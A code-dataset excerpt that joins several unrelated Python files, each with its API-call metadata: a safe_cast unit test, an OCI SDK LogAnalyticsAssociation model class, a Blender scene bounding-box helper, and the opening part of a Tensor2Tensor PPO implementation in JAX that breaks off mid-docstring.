(['self.df[target].values'], {}), '(self.df[target].values)\n', (2259, 2283), True, 'import numpy as np\n'), ((4750, 4784), 'torch.LongTensor', 'torch.LongTensor', (['[df_idx[target]]'], {}), '([df_idx[target]])\n', (4766, 4784), False, 'import torch\n')] |
import unittest
from dq import util
class TestUtil(unittest.TestCase):
def test_safe_cast(self):
assert util.safe_cast('1', int) == 1
assert util.safe_cast('meow', int, 2) == 2
| [
"dq.util.safe_cast"
]
| [((120, 144), 'dq.util.safe_cast', 'util.safe_cast', (['"""1"""', 'int'], {}), "('1', int)\n", (134, 144), False, 'from dq import util\n'), ((165, 195), 'dq.util.safe_cast', 'util.safe_cast', (['"""meow"""', 'int', '(2)'], {}), "('meow', int, 2)\n", (179, 195), False, 'from dq import util\n')] |
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class LogAnalyticsAssociation(object):
"""
LogAnalyticsAssociation
"""
#: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation.
#: This constant has a value of "ACCEPTED"
LIFE_CYCLE_STATE_ACCEPTED = "ACCEPTED"
#: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation.
#: This constant has a value of "IN_PROGRESS"
LIFE_CYCLE_STATE_IN_PROGRESS = "IN_PROGRESS"
#: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation.
#: This constant has a value of "SUCCEEDED"
LIFE_CYCLE_STATE_SUCCEEDED = "SUCCEEDED"
#: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation.
#: This constant has a value of "FAILED"
LIFE_CYCLE_STATE_FAILED = "FAILED"
def __init__(self, **kwargs):
"""
Initializes a new LogAnalyticsAssociation object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param failure_message:
The value to assign to the failure_message property of this LogAnalyticsAssociation.
:type failure_message: str
:param agent_id:
The value to assign to the agent_id property of this LogAnalyticsAssociation.
:type agent_id: str
:param time_last_attempted:
The value to assign to the time_last_attempted property of this LogAnalyticsAssociation.
:type time_last_attempted: datetime
:param retry_count:
The value to assign to the retry_count property of this LogAnalyticsAssociation.
:type retry_count: int
:param source_name:
The value to assign to the source_name property of this LogAnalyticsAssociation.
:type source_name: str
:param source_display_name:
The value to assign to the source_display_name property of this LogAnalyticsAssociation.
:type source_display_name: str
:param source_type_name:
The value to assign to the source_type_name property of this LogAnalyticsAssociation.
:type source_type_name: str
:param life_cycle_state:
The value to assign to the life_cycle_state property of this LogAnalyticsAssociation.
Allowed values for this property are: "ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type life_cycle_state: str
:param entity_id:
The value to assign to the entity_id property of this LogAnalyticsAssociation.
:type entity_id: str
:param entity_name:
The value to assign to the entity_name property of this LogAnalyticsAssociation.
:type entity_name: str
:param entity_type_name:
The value to assign to the entity_type_name property of this LogAnalyticsAssociation.
:type entity_type_name: str
:param host:
The value to assign to the host property of this LogAnalyticsAssociation.
:type host: str
:param agent_entity_name:
The value to assign to the agent_entity_name property of this LogAnalyticsAssociation.
:type agent_entity_name: str
:param entity_type_display_name:
The value to assign to the entity_type_display_name property of this LogAnalyticsAssociation.
:type entity_type_display_name: str
:param log_group_id:
The value to assign to the log_group_id property of this LogAnalyticsAssociation.
:type log_group_id: str
:param log_group_name:
The value to assign to the log_group_name property of this LogAnalyticsAssociation.
:type log_group_name: str
:param log_group_compartment:
The value to assign to the log_group_compartment property of this LogAnalyticsAssociation.
:type log_group_compartment: str
"""
self.swagger_types = {
'failure_message': 'str',
'agent_id': 'str',
'time_last_attempted': 'datetime',
'retry_count': 'int',
'source_name': 'str',
'source_display_name': 'str',
'source_type_name': 'str',
'life_cycle_state': 'str',
'entity_id': 'str',
'entity_name': 'str',
'entity_type_name': 'str',
'host': 'str',
'agent_entity_name': 'str',
'entity_type_display_name': 'str',
'log_group_id': 'str',
'log_group_name': 'str',
'log_group_compartment': 'str'
}
self.attribute_map = {
'failure_message': 'failureMessage',
'agent_id': 'agentId',
'time_last_attempted': 'timeLastAttempted',
'retry_count': 'retryCount',
'source_name': 'sourceName',
'source_display_name': 'sourceDisplayName',
'source_type_name': 'sourceTypeName',
'life_cycle_state': 'lifeCycleState',
'entity_id': 'entityId',
'entity_name': 'entityName',
'entity_type_name': 'entityTypeName',
'host': 'host',
'agent_entity_name': 'agentEntityName',
'entity_type_display_name': 'entityTypeDisplayName',
'log_group_id': 'logGroupId',
'log_group_name': 'logGroupName',
'log_group_compartment': 'logGroupCompartment'
}
self._failure_message = None
self._agent_id = None
self._time_last_attempted = None
self._retry_count = None
self._source_name = None
self._source_display_name = None
self._source_type_name = None
self._life_cycle_state = None
self._entity_id = None
self._entity_name = None
self._entity_type_name = None
self._host = None
self._agent_entity_name = None
self._entity_type_display_name = None
self._log_group_id = None
self._log_group_name = None
self._log_group_compartment = None
@property
def failure_message(self):
"""
Gets the failure_message of this LogAnalyticsAssociation.
The failure message.
:return: The failure_message of this LogAnalyticsAssociation.
:rtype: str
"""
return self._failure_message
@failure_message.setter
def failure_message(self, failure_message):
"""
Sets the failure_message of this LogAnalyticsAssociation.
The failure message.
:param failure_message: The failure_message of this LogAnalyticsAssociation.
:type: str
"""
self._failure_message = failure_message
@property
def agent_id(self):
"""
Gets the agent_id of this LogAnalyticsAssociation.
The agent unique identifier.
:return: The agent_id of this LogAnalyticsAssociation.
:rtype: str
"""
return self._agent_id
@agent_id.setter
def agent_id(self, agent_id):
"""
Sets the agent_id of this LogAnalyticsAssociation.
The agent unique identifier.
:param agent_id: The agent_id of this LogAnalyticsAssociation.
:type: str
"""
self._agent_id = agent_id
@property
def time_last_attempted(self):
"""
Gets the time_last_attempted of this LogAnalyticsAssociation.
The last attempt date.
:return: The time_last_attempted of this LogAnalyticsAssociation.
:rtype: datetime
"""
return self._time_last_attempted
@time_last_attempted.setter
def time_last_attempted(self, time_last_attempted):
"""
Sets the time_last_attempted of this LogAnalyticsAssociation.
The last attempt date.
:param time_last_attempted: The time_last_attempted of this LogAnalyticsAssociation.
:type: datetime
"""
self._time_last_attempted = time_last_attempted
@property
def retry_count(self):
"""
Gets the retry_count of this LogAnalyticsAssociation.
The number of times the association will be attempted
before failing.
:return: The retry_count of this LogAnalyticsAssociation.
:rtype: int
"""
return self._retry_count
@retry_count.setter
def retry_count(self, retry_count):
"""
Sets the retry_count of this LogAnalyticsAssociation.
The number of times the association will be attempted
before failing.
:param retry_count: The retry_count of this LogAnalyticsAssociation.
:type: int
"""
self._retry_count = retry_count
@property
def source_name(self):
"""
Gets the source_name of this LogAnalyticsAssociation.
The source name.
:return: The source_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._source_name
@source_name.setter
def source_name(self, source_name):
"""
Sets the source_name of this LogAnalyticsAssociation.
The source name.
:param source_name: The source_name of this LogAnalyticsAssociation.
:type: str
"""
self._source_name = source_name
@property
def source_display_name(self):
"""
Gets the source_display_name of this LogAnalyticsAssociation.
The source display name.
:return: The source_display_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._source_display_name
@source_display_name.setter
def source_display_name(self, source_display_name):
"""
Sets the source_display_name of this LogAnalyticsAssociation.
The source display name.
:param source_display_name: The source_display_name of this LogAnalyticsAssociation.
:type: str
"""
self._source_display_name = source_display_name
@property
def source_type_name(self):
"""
Gets the source_type_name of this LogAnalyticsAssociation.
The source type internal name.
:return: The source_type_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._source_type_name
@source_type_name.setter
def source_type_name(self, source_type_name):
"""
Sets the source_type_name of this LogAnalyticsAssociation.
The source type internal name.
:param source_type_name: The source_type_name of this LogAnalyticsAssociation.
:type: str
"""
self._source_type_name = source_type_name
@property
def life_cycle_state(self):
"""
Gets the life_cycle_state of this LogAnalyticsAssociation.
The lifecycle status. Valid values are ACCEPTED, IN_PROGRESS, SUCCEEDED
or FAILED.
Allowed values for this property are: "ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The life_cycle_state of this LogAnalyticsAssociation.
:rtype: str
"""
return self._life_cycle_state
@life_cycle_state.setter
def life_cycle_state(self, life_cycle_state):
"""
Sets the life_cycle_state of this LogAnalyticsAssociation.
The lifecycle status. Valid values are ACCEPTED, IN_PROGRESS, SUCCEEDED
or FAILED.
:param life_cycle_state: The life_cycle_state of this LogAnalyticsAssociation.
:type: str
"""
allowed_values = ["ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED"]
if not value_allowed_none_or_none_sentinel(life_cycle_state, allowed_values):
life_cycle_state = 'UNKNOWN_ENUM_VALUE'
self._life_cycle_state = life_cycle_state
@property
def entity_id(self):
"""
Gets the entity_id of this LogAnalyticsAssociation.
The entity unique identifier.
:return: The entity_id of this LogAnalyticsAssociation.
:rtype: str
"""
return self._entity_id
@entity_id.setter
def entity_id(self, entity_id):
"""
Sets the entity_id of this LogAnalyticsAssociation.
The entity unique identifier.
:param entity_id: The entity_id of this LogAnalyticsAssociation.
:type: str
"""
self._entity_id = entity_id
@property
def entity_name(self):
"""
Gets the entity_name of this LogAnalyticsAssociation.
The entity name.
:return: The entity_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._entity_name
@entity_name.setter
def entity_name(self, entity_name):
"""
Sets the entity_name of this LogAnalyticsAssociation.
The entity name.
:param entity_name: The entity_name of this LogAnalyticsAssociation.
:type: str
"""
self._entity_name = entity_name
@property
def entity_type_name(self):
"""
Gets the entity_type_name of this LogAnalyticsAssociation.
The entity type internal name.
:return: The entity_type_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._entity_type_name
@entity_type_name.setter
def entity_type_name(self, entity_type_name):
"""
Sets the entity_type_name of this LogAnalyticsAssociation.
The entity type internal name.
:param entity_type_name: The entity_type_name of this LogAnalyticsAssociation.
:type: str
"""
self._entity_type_name = entity_type_name
@property
def host(self):
"""
Gets the host of this LogAnalyticsAssociation.
The host name.
:return: The host of this LogAnalyticsAssociation.
:rtype: str
"""
return self._host
@host.setter
def host(self, host):
"""
Sets the host of this LogAnalyticsAssociation.
The host name.
:param host: The host of this LogAnalyticsAssociation.
:type: str
"""
self._host = host
@property
def agent_entity_name(self):
"""
Gets the agent_entity_name of this LogAnalyticsAssociation.
The name of the entity which contains the agent.
:return: The agent_entity_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._agent_entity_name
@agent_entity_name.setter
def agent_entity_name(self, agent_entity_name):
"""
Sets the agent_entity_name of this LogAnalyticsAssociation.
The name of the entity which contains the agent.
:param agent_entity_name: The agent_entity_name of this LogAnalyticsAssociation.
:type: str
"""
self._agent_entity_name = agent_entity_name
@property
def entity_type_display_name(self):
"""
Gets the entity_type_display_name of this LogAnalyticsAssociation.
The entity type display name.
:return: The entity_type_display_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._entity_type_display_name
@entity_type_display_name.setter
def entity_type_display_name(self, entity_type_display_name):
"""
Sets the entity_type_display_name of this LogAnalyticsAssociation.
The entity type display name.
:param entity_type_display_name: The entity_type_display_name of this LogAnalyticsAssociation.
:type: str
"""
self._entity_type_display_name = entity_type_display_name
@property
def log_group_id(self):
"""
Gets the log_group_id of this LogAnalyticsAssociation.
The log group unique identifier.
:return: The log_group_id of this LogAnalyticsAssociation.
:rtype: str
"""
return self._log_group_id
@log_group_id.setter
def log_group_id(self, log_group_id):
"""
Sets the log_group_id of this LogAnalyticsAssociation.
The log group unique identifier.
:param log_group_id: The log_group_id of this LogAnalyticsAssociation.
:type: str
"""
self._log_group_id = log_group_id
@property
def log_group_name(self):
"""
Gets the log_group_name of this LogAnalyticsAssociation.
The log group name.
:return: The log_group_name of this LogAnalyticsAssociation.
:rtype: str
"""
return self._log_group_name
@log_group_name.setter
def log_group_name(self, log_group_name):
"""
Sets the log_group_name of this LogAnalyticsAssociation.
The log group name.
:param log_group_name: The log_group_name of this LogAnalyticsAssociation.
:type: str
"""
self._log_group_name = log_group_name
@property
def log_group_compartment(self):
"""
Gets the log_group_compartment of this LogAnalyticsAssociation.
The log group compartment.
:return: The log_group_compartment of this LogAnalyticsAssociation.
:rtype: str
"""
return self._log_group_compartment
@log_group_compartment.setter
def log_group_compartment(self, log_group_compartment):
"""
Sets the log_group_compartment of this LogAnalyticsAssociation.
The log group compartment.
:param log_group_compartment: The log_group_compartment of this LogAnalyticsAssociation.
:type: str
"""
self._log_group_compartment = log_group_compartment
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| [
"oci.util.formatted_flat_dict",
"oci.util.value_allowed_none_or_none_sentinel"
]
| [((18491, 18516), 'oci.util.formatted_flat_dict', 'formatted_flat_dict', (['self'], {}), '(self)\n', (18510, 18516), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((12440, 12509), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', (['life_cycle_state', 'allowed_values'], {}), '(life_cycle_state, allowed_values)\n', (12475, 12509), False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n')] |
import logging
from typing import Tuple
import bpy
from mathutils import Vector
from .object import get_objs
logger = logging.getLogger(__name__)
class SceneBoundingBox():
"""Scene bounding box, build a bounding box that includes all objects except the excluded ones."""
################################################################################################
# Properties
#
# ==============================================================================================
@property
def width(self):
"""Scene's bounding box width."""
return self.x_max - self.x_min
# ==============================================================================================
@property
def depth(self):
"""Scene's bounding box depth."""
return self.y_max - self.y_min
# ==============================================================================================
@property
def height(self):
"""Scene's bounding box height."""
return self.z_max - self.z_min
# ==============================================================================================
@property
def floor_center(self):
"""Scene's bounding center on lower bbox plane."""
return Vector((self.center[0], self.center[1], self.z_min))
################################################################################################
# Constructor
#
# ==============================================================================================
def __init__(self, scene: bpy.types.Scene,
exclude_collections: Tuple[str] = ("SfM_Environment", "SfM_Reconstructions")):
self.scene = scene
self.exclude_collections = exclude_collections
#
self.center = Vector() # type: Vector
self.x_min = float("inf") # type: float
self.x_max = float("-inf") # type: float
self.y_min = float("inf") # type: float
self.y_max = float("-inf") # type: float
self.z_min = float("inf") # type: float
self.z_max = float("-inf") # type: float
#
self.compute()
################################################################################################
# Methods
#
# ==============================================================================================
def compute(self):
"""Compute the scene bounding box values."""
objs = get_objs(self.scene, exclude_collections=self.exclude_collections, mesh_only=True)
logger.debug("Found %i objects in scene %s", len(objs), self.scene.name)
for obj in objs:
obb = obj.bound_box
for i in range(8):
p = obj.matrix_world @ Vector(obb[i])
self.x_min = min(self.x_min, p[0])
self.x_max = max(self.x_max, p[0])
self.y_min = min(self.y_min, p[1])
self.y_max = max(self.y_max, p[1])
self.z_min = min(self.z_min, p[2])
self.z_max = max(self.z_max, p[2])
if objs:
self.center = Vector(((self.x_max + self.x_min) / 2,
(self.y_max + self.y_min) / 2,
(self.z_max + self.z_min) / 2))
logger.debug(str(self))
# ==============================================================================================
def get_min_vector(self):
"""Get minimum axis."""
return Vector((self.x_min, self.y_min, self.z_min))
# ==============================================================================================
def get_max_vector(self):
"""Get maximum axis."""
return Vector((self.x_max, self.y_max, self.z_max))
################################################################################################
# Builtin methods
#
# ==============================================================================================
def __str__(self):
return "Scene bbox values: X=({:.3f}, {:.3f}), Y=({:.3f}, {:.3f}), Z=({:.3f}, {:.3f}), Center={}".format(
self.x_min, self.x_max, self.y_min, self.y_max, self.z_min, self.z_max, self.center)
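# Illustrative usage sketch (not part of the original module); assumes it runs
# inside Blender, where `bpy.context.scene` is available:
#
#   bbox = SceneBoundingBox(bpy.context.scene)
#   print(bbox.width, bbox.depth, bbox.height)
#   lowest_plane_center = bbox.floor_center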
| [
"logging.getLogger",
"mathutils.Vector"
]
| [((122, 149), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (139, 149), False, 'import logging\n'), ((1280, 1332), 'mathutils.Vector', 'Vector', (['(self.center[0], self.center[1], self.z_min)'], {}), '((self.center[0], self.center[1], self.z_min))\n', (1286, 1332), False, 'from mathutils import Vector\n'), ((1818, 1826), 'mathutils.Vector', 'Vector', ([], {}), '()\n', (1824, 1826), False, 'from mathutils import Vector\n'), ((3538, 3582), 'mathutils.Vector', 'Vector', (['(self.x_min, self.y_min, self.z_min)'], {}), '((self.x_min, self.y_min, self.z_min))\n', (3544, 3582), False, 'from mathutils import Vector\n'), ((3762, 3806), 'mathutils.Vector', 'Vector', (['(self.x_max, self.y_max, self.z_max)'], {}), '((self.x_max, self.y_max, self.z_max))\n', (3768, 3806), False, 'from mathutils import Vector\n'), ((3157, 3263), 'mathutils.Vector', 'Vector', (['((self.x_max + self.x_min) / 2, (self.y_max + self.y_min) / 2, (self.z_max +\n self.z_min) / 2)'], {}), '(((self.x_max + self.x_min) / 2, (self.y_max + self.y_min) / 2, (self\n .z_max + self.z_min) / 2))\n', (3163, 3263), False, 'from mathutils import Vector\n'), ((2793, 2807), 'mathutils.Vector', 'Vector', (['obb[i]'], {}), '(obb[i])\n', (2799, 2807), False, 'from mathutils import Vector\n')] |
# coding=utf-8
# Copyright 2019 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PPO in JAX.
Notation:
B, scalar - batch size
T, scalar - number of time-steps in a trajectory, or the value of the padded
time-step dimension.
OBS, tuple - shape of a singular observation from the environment.
Ex: For CartPole-v0 this is (4,) and Pong-v0 it's (210, 160, 3)
A, scalar - Number of actions, assuming a discrete space.
Policy and Value function signatures:
Policy Function :: [B, T] + OBS -> [B, T, A]
Value Function :: [B, T] + OBS -> [B, T, 1]
Policy and Value Function :: [B, T] + OBS -> ([B, T, A], [B, T, 1])
i.e. the policy net should take a batch of *trajectories* and at each time-step
in each batch deliver a probability distribution over actions.
NOTE: It doesn't return logits, rather the expectation is that it returns
log-probabilities instead.
NOTE: The policy and value functions need to take care to not take into account
future time-steps while deciding the actions (or value) for the current
time-step.
Policy and Value Function produces a tuple of the expected output of a policy
function and a value function.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import pickle
import time
from absl import logging
import gym
from jax import grad
from jax import jit
from jax import lax
from jax import numpy as np
from jax import random as jax_random
import numpy as onp
from tensor2tensor.envs import env_problem
from tensor2tensor.envs import env_problem_utils
from tensor2tensor.trax import jaxboard
from tensor2tensor.trax import layers
from tensor2tensor.trax import optimizers as trax_opt
from tensor2tensor.trax import trax
from tensorflow.io import gfile
DEBUG_LOGGING = False
GAMMA = 0.99
LAMBDA = 0.95
EPSILON = 0.1
EPOCHS = 50 # 100
NUM_OPTIMIZER_STEPS = 100
PRINT_EVERY_OPTIMIZER_STEP = 20
BATCH_TRAJECTORIES = 32
def policy_and_value_net(rng_key,
batch_observations_shape,
num_actions,
bottom_layers_fn=None,
two_towers=True):
"""A policy and value net function."""
# Layers.
# Now, with the current logits, one head computes action probabilities and the
# other computes the value function.
  # NOTE: LogSoftmax is used instead of Softmax for numerical stability.
net = None
if not two_towers:
tower = [] if bottom_layers_fn is None else bottom_layers_fn()
tower.extend([
layers.Branch(
layers.Serial(layers.Dense(num_actions), layers.LogSoftmax()),
layers.Dense(1))
])
net = layers.Serial(*tower)
else:
tower1 = [] if bottom_layers_fn is None else bottom_layers_fn()
tower2 = [] if bottom_layers_fn is None else bottom_layers_fn()
tower1.extend([layers.Dense(num_actions), layers.LogSoftmax()])
tower2.extend([layers.Dense(1)])
net = layers.Branch(
layers.Serial(*tower1),
layers.Serial(*tower2),
)
assert net
return net.initialize(batch_observations_shape, rng_key), net
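# Illustrative example (not from the original source): for CartPole-v0, which
# has observations of shape (4,) and 2 actions, the call below would build a
# two-tower net whose apply function maps observations of shape [B, T] + (4,)
# to a (log-probs [B, T, 2], values [B, T, 1]) pair:
#
#   params, net = policy_and_value_net(
#       rng_key, batch_observations_shape=(-1, -1, 4), num_actions=2)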
def optimizer_fun(net_params, step_size=1e-3):
opt = trax_opt.Adam(step_size=step_size, b1=0.9, b2=0.999, eps=1e-08)
opt_init = lambda x: (x, opt.tree_init(x))
opt_update = lambda i, g, s: opt.tree_update(i, g, s[0], s[1])
get_params = lambda x: x[0]
opt_state = opt_init(net_params)
return opt_state, opt_update, get_params
# Should this be collect 'n' trajectories, or
# Run the env for 'n' steps and take completed trajectories, or
# Any other option?
# TODO(afrozm): Replace this with EnvProblem?
def collect_trajectories(env,
policy_fun,
num_trajectories=1,
policy=env_problem_utils.CATEGORICAL_SAMPLING,
max_timestep=None,
boundary=20,
epsilon=0.1,
reset=True,
rng=None):
"""Collect trajectories with the given policy net and behaviour.
Args:
env: A gym env interface, for now this is not-batched.
policy_fun: observations(B,T+1) -> log-probabs(B,T+1, A) callable.
num_trajectories: int, number of trajectories.
policy: string, "greedy", "epsilon-greedy", or "categorical-sampling" i.e.
how to use the policy_fun to return an action.
max_timestep: int or None, the index of the maximum time-step at which we
return the trajectory, None for ending a trajectory only when env returns
done.
boundary: int, boundary for padding, used in EnvProblem envs.
epsilon: float, the epsilon for `epsilon-greedy` policy.
reset: bool, true if we want to reset the envs. The envs are also reset if
      max_timestep is None or < 0
rng: jax rng, splittable.
Returns:
A tuple (trajectory, number of trajectories that are done)
trajectory: list of (observation, action, reward) tuples, where each element
`i` is a tuple of numpy arrays with shapes as follows:
observation[i] = (B, T_i + 1)
action[i] = (B, T_i)
reward[i] = (B, T_i)
"""
assert isinstance(env, env_problem.EnvProblem)
# This is an env_problem, run its collect function.
return env_problem_utils.play_env_problem_with_policy(
env,
policy_fun,
num_trajectories=num_trajectories,
max_timestep=max_timestep,
boundary=boundary,
policy_sampling=policy,
eps=epsilon,
reset=reset,
rng=rng)
# This function can probably be simplified, ask how?
# Can we do something much simpler than lax.pad, maybe np.pad?
# Others?
def get_padding_value(dtype):
"""Returns the padding value given a dtype."""
padding_value = None
if dtype == np.uint8:
padding_value = np.uint8(0)
elif dtype == np.uint16:
padding_value = np.uint16(0)
elif dtype == np.float32 or dtype == np.float64:
padding_value = 0.0
else:
padding_value = 0
assert padding_value is not None
return padding_value
# TODO(afrozm): Use np.pad instead and make jittable?
def pad_trajectories(trajectories, boundary=20):
"""Pad trajectories to a bucket length that is a multiple of boundary.
Args:
trajectories: list[(observation, actions, rewards)], where each observation
is shaped (t+1,) + OBS and actions & rewards are shaped (t,), with the
length of the list being B (batch size).
boundary: int, bucket length, the actions and rewards are padded to integer
multiples of boundary.
Returns:
tuple: (padding lengths, reward_mask, padded_observations, padded_actions,
padded_rewards) where padded_observations is shaped (B, T+1) + OBS and
padded_actions, padded_rewards & reward_mask are shaped (B, T).
Where T is max(t) rounded up to an integer multiple of boundary.
padded_length is how much padding we've added and
reward_mask is 1s for actual rewards and 0s for the padding.
"""
# Let's compute max(t) over all trajectories.
t_max = max(r.shape[0] for (_, _, r) in trajectories)
# t_max is rounded to the next multiple of `boundary`
boundary = int(boundary)
bucket_length = boundary * int(np.ceil(float(t_max) / boundary))
# So all obs will be padded to t_max + 1 and actions and rewards to t_max.
padded_observations = []
padded_actions = []
padded_rewards = []
padded_lengths = []
reward_masks = []
for (o, a, r) in trajectories:
# Determine the amount to pad, this holds true for obs, actions and rewards.
num_to_pad = bucket_length + 1 - o.shape[0]
padded_lengths.append(num_to_pad)
if num_to_pad == 0:
padded_observations.append(o)
padded_actions.append(a)
padded_rewards.append(r)
reward_masks.append(onp.ones_like(r, dtype=np.int32))
continue
# First pad observations.
padding_config = [(0, num_to_pad, 0)]
for _ in range(o.ndim - 1):
padding_config.append((0, 0, 0))
padding_config = tuple(padding_config)
padding_value = get_padding_value(o.dtype)
action_padding_value = get_padding_value(a.dtype)
reward_padding_value = get_padding_value(r.dtype)
padded_obs = lax.pad(o, padding_value, padding_config)
padded_observations.append(padded_obs)
# Now pad actions and rewards.
assert a.ndim == 1 and r.ndim == 1
padding_config = ((0, num_to_pad, 0),)
padded_action = lax.pad(a, action_padding_value, padding_config)
padded_actions.append(padded_action)
padded_reward = lax.pad(r, reward_padding_value, padding_config)
padded_rewards.append(padded_reward)
# Also create the mask to use later.
reward_mask = onp.ones_like(r, dtype=np.int32)
reward_masks.append(lax.pad(reward_mask, 0, padding_config))
return padded_lengths, np.stack(reward_masks), np.stack(
padded_observations), np.stack(padded_actions), np.stack(padded_rewards)
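# Worked example (illustrative, not from the original source): with boundary=20
# and a longest trajectory of t_max=33 steps, bucket_length = 20 * ceil(33 / 20)
# = 40, so each observation sequence is padded to length 41 (T+1) and each
# action / reward sequence to length 40, with reward_mask marking real steps.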
# TODO(afrozm): JAX-ify this, this is too slow for pong.
def rewards_to_go(rewards, mask, gamma=0.99):
r"""Computes rewards to go.
Reward to go is defined as follows, the discounted reward that we have to
yet collect, going forward from this point, i.e.:
r2g_t = \sum_{l=0}^{\infty} (\gamma^{l} * reward_{t+l})
Args:
rewards: np.ndarray of shape (B, T) of rewards.
mask: np.ndarray of shape (B, T) of mask for the rewards.
gamma: float, discount factor.
Returns:
rewards to go, np.ndarray of shape (B, T).
"""
B, T = rewards.shape # pylint: disable=invalid-name,unused-variable
masked_rewards = rewards * mask # (B, T)
# We use the following recurrence relation, derived from the equation above:
#
# r2g[t+1] = (r2g[t] - r[t]) / gamma
#
# This means we'll need to calculate r2g[0] first and then r2g[1] and so on ..
#
# **However** this leads to overflows for long sequences: r2g[t] - r[t] > 0
# and gamma < 1.0, so the division keeps increasing.
#
# So we just run the recurrence in reverse, i.e.
#
# r2g[t] = r[t] + (gamma*r2g[t+1])
#
# This is much better, but might have lost updates since the (small) rewards
# at earlier time-steps may get added to a (very?) large sum.
# Compute r2g_{T-1} at the start and then compute backwards in time.
r2gs = [masked_rewards[:, -1]]
# Go from T-2 down to 0.
for t in reversed(range(T - 1)):
r2gs.append(masked_rewards[:, t] + (gamma * r2gs[-1]))
# The list should have length T.
assert T == len(r2gs)
# First we stack them in the correct way to make it (B, T), but these are
# still from newest (T-1) to oldest (0), so then we flip it on time axis.
return np.flip(np.stack(r2gs, axis=1), axis=1)
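# Tiny worked example (illustrative, not from the original source): for a
# single trajectory with rewards [1, 1, 1], mask [1, 1, 1] and gamma=0.5, the
# recurrence gives r2g = [1 + 0.5 * 1.5, 1 + 0.5 * 1, 1] = [1.75, 1.5, 1.0].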
@jit
def value_loss_given_predictions(value_prediction,
rewards,
reward_mask,
gamma=0.99,
epsilon=0.2,
value_prediction_old=None):
"""Computes the value loss given the prediction of the value function.
Args:
value_prediction: np.ndarray of shape (B, T+1, 1)
rewards: np.ndarray of shape (B, T) of rewards.
reward_mask: np.ndarray of shape (B, T), the mask over rewards.
gamma: float, discount factor.
    epsilon: float, clip-fraction, used if value_prediction_old isn't None
value_prediction_old: np.ndarray of shape (B, T+1, 1) of value predictions
using the old parameters. If provided, we incorporate this in the loss as
well. This is from the OpenAI baselines implementation.
Returns:
The average L2 value loss, averaged over instances where reward_mask is 1.
"""
B, T = rewards.shape # pylint: disable=invalid-name
assert (B, T) == reward_mask.shape
assert (B, T + 1, 1) == value_prediction.shape
value_prediction = np.squeeze(value_prediction, axis=2) # (B, T+1)
value_prediction = value_prediction[:, :-1] * reward_mask # (B, T)
r2g = rewards_to_go(rewards, reward_mask, gamma=gamma) # (B, T)
loss = (value_prediction - r2g)**2
# From the baselines implementation.
if value_prediction_old is not None:
value_prediction_old = np.squeeze(value_prediction_old, axis=2) # (B, T+1)
value_prediction_old = value_prediction_old[:, :-1] * reward_mask # (B, T)
v_clipped = value_prediction_old + np.clip(
value_prediction - value_prediction_old, -epsilon, epsilon)
v_clipped_loss = (v_clipped - r2g)**2
loss = np.maximum(v_clipped_loss, loss)
# Take an average on only the points where mask != 0.
return np.sum(loss) / np.sum(reward_mask)
# TODO(afrozm): JAX-ify this, this is too slow for pong.
def deltas(predicted_values, rewards, mask, gamma=0.99):
r"""Computes TD-residuals from V(s) and rewards.
Where a `delta`, i.e. a td-residual is defined as:
delta_{b,t} = r_{b,t} + \gamma * v_{b,t+1} - v_{b,t}.
Args:
predicted_values: ndarray of shape (B, T+1). NOTE: Expects axis 2 was
squeezed. These represent V(s_bt) for b < B and t < T+1
rewards: ndarray of shape (B, T) of rewards.
mask: ndarray of shape (B, T) of mask for rewards.
gamma: float, discount factor.
Returns:
ndarray of shape (B, T) of one-step TD-residuals.
"""
# `d`s are basically one-step TD residuals.
d = []
_, T = rewards.shape # pylint: disable=invalid-name
for t in range(T):
d.append(rewards[:, t] + (gamma * predicted_values[:, t + 1]) -
predicted_values[:, t])
return np.array(d).T * mask
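# Worked example (illustrative, not from the original source): with gamma=0.99,
# reward r_t=1.0, V(s_t)=1.5 and V(s_{t+1})=2.0, the one-step TD-residual is
# delta_t = 1.0 + 0.99 * 2.0 - 1.5 = 1.48.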
def gae_advantages(td_deltas, mask, lambda_=0.95, gamma=0.99):
r"""Computes the GAE advantages given the one step TD-residuals.
